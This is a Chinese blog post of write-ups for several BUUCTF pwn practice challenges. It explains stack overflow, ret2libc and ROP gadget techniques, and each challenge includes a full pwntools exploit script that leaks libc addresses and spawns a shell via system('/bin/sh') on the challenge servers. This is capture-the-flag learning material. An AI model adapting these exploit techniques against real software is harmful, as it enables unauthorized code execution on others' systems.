BUU-pwn(二)

最新推荐文章于 2023-07-13 11:40:36 发布
最新推荐文章于 2023-07-13 11:40:36 发布
阅读量302 收藏 5
点赞数
分类专栏: pwn 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/124413030
版权

ciscn_2019_n_8

32位程序,逻辑很简单 需要var[13] == 17

需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64
exp

from pwn import *

r = remote('node4.buuoj.cn',29396)

payload = b'aaaa'*13+p64(0x11)
r.sendline(payload)
r.interactive()

jarvisoj_level2

32位程序
明显栈溢出
在这里插入图片描述
找到system函数地址与/bin/sh地址

exp

from pwn import *
context(log_level='debug')
r = remote('node4.buuoj.cn',28037)

sys_addr = 0x08048320
sh_addr = 0x0804A024
payload = b'a'*0x88+b'a'*0x4+p32(sys_addr)+p32(0)+p32(sh_addr)
r.sendlineafter('Input:',payload)
r.interactive()

[OGeek2019]babyrop

32位程序,题目给了libc-2.23.so,main函数

看下sub_804871F()

sub_80487D0()函数参数a1为上面函数的返回值,这里可以溢出,然后通过write泄露write地址

利用函数泄露地址原理:

利用write函数获取函数地址

函数原型: ssize_t write (int fd, const void * buf, size_t count);

payload:'a' * 栈大小 + ebp + write_plt_addr + write执行后的返回地址 + fd + 要泄露的地址 + count

利用puts函数获取函数地址

函数原型: int puts(const char *string);

payload:
payload = b''
payload += b'a' * 0x              # 栈的大小
payload += p64(0)               # ebp
payload += p64(pop_rdi)         # 给puts()函数赋值
payload += p64(addr)            # leak函数的参数addr  可以为puts_got
payload += p64(puts_plt)        # puts函数地址

exp

from pwn import *
context(log_level='debug')
r = remote('node4.buuoj.cn',27043)

elf = ELF('./pwn')
lib = ELF('./libc-2.23.so')

write_got = elf.got['write']
write_plt = elf.plt['write']
main = 0x08048825

payload1 = "\x00"+"\xFF"*7
r.sendline(payload1) # strcmp bypass and change buf[7]
r.recvuntil('Correct\n')

# leak write addr
payload2 = b'a'*0xe7+b'a'*0x4
payload2 += p32(write_plt)+p32(main)+p32(0)+p32(write_got)+p32(4)
r.sendline(payload2)

write_addr = u32(r.recv(4))
print('[+]write_addr: '+str(write_addr))

# use offset to system and /bin/sh
offset = write_addr - lib.sym['write']
sys_addr = lib.sym['system'] + offset
binsh_addr = lib.search(b'/bin/sh').__next__() + offset

r.sendline(payload1)
r.recvuntil('Correct\n')

payload3 = b'a'*0xe7+b'a'*0x4
payload3 += p32(sys_addr) + b'a'*0x4 + p32(binsh_addr)

r.sendline(payload3)
r.interactive()

bjdctf_2020_babystack

栈溢出

exp

from pwn import *
context(log_level='debug')
r = remote('node4.buuoj.cn',26914)

sys_addr = 0x04006e6
payload = b'a'*0x10+b'a'*0x8+p64(sys_addr)+p64(0)

r.sendlineafter('[+]Please input the length of your name:','50')
r.sendlineafter('[+]What\'s u name?',payload)
r.interactive()

get_started_3dsctf_2016

main函数存在溢出

发现有个后门函数

直接返回到后门函数地址然后再填充被调函数参数,也就是a1和a2,这里ebp需要为exit
exp

from pwn import *
context(log_level='debug')
r = remote('node4.buuoj.cn',28440)

getflag_addr = 0x80489A0
exit_addr = 0x0804E6A0

payload = b'a'*56+p32(getflag_addr)+p32(exit_addr)+p32(0x308cd64f)+p32(0x195719d1)
r.sendline(payload)
print(r.recv())

#r.interactive()

ciscn_2019_en_2

64位程序

begin()是一个菜单,给了三个选择 encrypt、decrypt、exit,无system以及/bin/sh 属于是ret2libc题型

看一下encrypt()函数,gets()存在溢出点,strlen利用 \x00 绕过

思路:

  1. 劫持返回地址,调用puts函数泄露libc基地址,再次返回到main函数
  2. 通过泄露出的libc基地址计算出"/bin/sh"和system()的地址,再次劫持返回地址,执行system(“/bin/sh”)获得shell

几篇文章
ROP-Ret2csu详解
pwn系列之ret2(四)
Linux x64 下的万能 Gadget
一步一步学ROP之linux_x64篇
buu-ciscn_2019_en_2

64位程序函数传参数的方式与32位程序不相同,32位程序将函数参数直接压入栈中,64位程序当参数少于7个时,参数从左到右 放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。

x64 程序调用libc会存在 __libc_csu_init 这个函数用来对 libc 进行初始化操作

借用文章中的图来看下 __libc_csu_init

将地址 0x400622 上 pop r15,ret 的三字节指令(0x41 0x5F 0xC3)拆散看,会发现后两个字节组成了一组新的指令 pop rdi,ret。

这对于puts()有什么用呢?在 [OGeek2019]babyrop 中知道,puts所需要的参数为一个参数,而这个pop rdi正好符合了要求,从栈上弹出一个单位到rdi中,然后ret调用puts时,从rdi中获取那一个参数。

所以我们构造的payload为

payload += b'a' * 0x..          # 栈的大小
payload += p64(0)               # ebp
payload += p64(pop_rdi)         # 给puts()函数赋值
payload += p64(addr)            # leak函数的参数addr  可以为puts_got
payload += p64(puts_plt)        # puts函数地址

寻找 gadget 有两个工具

第一个ROPgaget(安装了gdb-peda就有):

ROPgaget --文件名 pwn | grep "要找的东西,比如pop rdi"

第二个ropper:

ropper --file 文件名 --search "要找的东西"


这里环境为ubuntu18,看了下其他师傅的wp,提到了栈平衡

第一次控制返回地址的时候执行了pop rdi,导致栈地址向下向上偏移了8位,而Ubuntu18要求栈地址要16位(0x10)对齐,所以在第二次控制返回地址的时候加个p64(ret)就可以解决

exp

from pwn import *
from LibcSearcher import *

context(log_level='debug')
r = remote('node4.buuoj.cn',26208)
#r=process('./ciscn_2019_en_2')
elf = ELF('./ciscn_2019_en_2')

puts_plt = elf.plt['puts']
puts_gots = elf.got['puts']

main_addr = 0x0400B28
pop_rdi = 0x0400c83
ret=0x4006b9

r.sendlineafter('Input your choice!','1')
payload = b'\x00'+b'a'*(0x50-0x1)+b'a'*0x8
payload += p64(pop_rdi)+p64(puts_gots)+p64(puts_plt)+p64(main_addr) # puts ret addr ?
r.sendlineafter('Input your Plaintext to be encrypted\n',payload)
print('first puts: '+str(r.recvline())) # puts("Ciphertext")
print('second puts: '+str(r.recvline())) # puts(s)

puts_addr=u64(r.recvuntil("\n",True).ljust(8,b"\x00"))
print(hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
offset = puts_addr - libc.dump('puts')
sys_addr = offset + libc.dump('system')
bin_sh_addr = offset + libc.dump('str_bin_sh')

r.sendlineafter('Input your choice!\n','1')
payload2 = b'\x00'+b'a'*(0x50-0x1)+b'a'*0x8+p64(ret)+p64(pop_rdi)+p64(bin_sh_addr)+p64(sys_addr)
r.sendlineafter('Input your Plaintext to be encrypted\n',payload2)
r.interactive()

jarvisoj_level2_x64

64位程序栈溢出
exp

from pwn import *

context(log_level='debug')
r = remote('node4.buuoj.cn',27790)
sys_addr = 0x04004c0
binsh_addr = 0x0600a90
pop_addr = 0x04006b3

payload = b'a'*0x80+b'a'*0x8+p64(pop_addr)+p64(binsh_addr)+p64(sys_addr)
r.sendlineafter('Input:\n',payload)
r.interactive()

[HarekazeCTF2019]baby_rop

64位,exp

from pwn import *
import os

context(log_level='debug')
elf = ELF('./babyrop')
r = remote('node4.buuoj.cn',25565)

sys_addr = elf.sym['system']
binsh_addr = 0x0601048

def get_pop(file):
    cmd = 'ROPgadget --binary {} |grep "pop rdi"'.format(file)
    res = os.popen(cmd).read().split(':')[0][-8:]
    return int('0x'+res,16)

pop_addr = get_pop('babyrop')

payload = b'a'*0x10+b'a'*0x8+p64(pop_addr)+p64(binsh_addr)+p64(sys_addr)
r.sendlineafter('What\'s your name?',payload)
r.interactive()
Ff.cheng
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU PWN(一)
playmaker的博客
01-28 2085
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
BUU-pwn(一)
qq_53263789的博客
04-24 303
rip 简单栈溢出,后门函数 exp from pwn import * #io=process("./pwn") r = remote('node4.buuoj.cn',25253) payload=b'a'*0xf+b'a'*0x08+p64(0x0401187) r.sendline(payload) r.interactive() warmup_csaw_2016 后门函数 int sub_40060D() 泄露地址 exp from pwn import * #io=process("./pw
buu_pwn
王富贵同学的博客
09-29 1996
warmup_csaw_2016 明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
BUU PWN ()
playmaker的博客
02-07 819
BUU PWN () level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
BUU-pwn(四)
qq_53263789的博客
09-04 162
BUU-pwn(四)
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU-pwn(三)
qq_53263789的博客
06-19 245
pwn(三)
buupwn1_sctf_2016
xieyichensss的博客
03-18 711
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
BUU刷题-Pwn-test
一个啥也不会的小菜鸡!
07-13 52
直接执行即可,获得主机权限!
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 186
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 601
写题笔记
[BUUCTF-pwn]——pwn2_sctf_2016
Y_peak的博客
02-12 500
[BUUCTF-pwn]——pwn2_sctf_2016 题目地址: https://buuoj.cn/challenges#pwn2_sctf_2016 老规矩还是先checksec一下, 在IDA中看看, 这个get_n(a, b)的作用就是读入 b 个字符。将其合成的字符串赋值给a。 最常用的方法,也是我经常使用的方法就是利用 libc库 计算偏移。然后循环利用函数。只有printf函数可以打印, 找到需要用的地址。 思路 利用printf泄露printf的实际地址, 通过计算偏移,以此
BUUCTF之PWN(WP1)
NANMUZN的博客
01-15 619
buuctf pwn
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 409
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
BUUCTF pwn 五月刷题
coco的博客
05-04 668
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值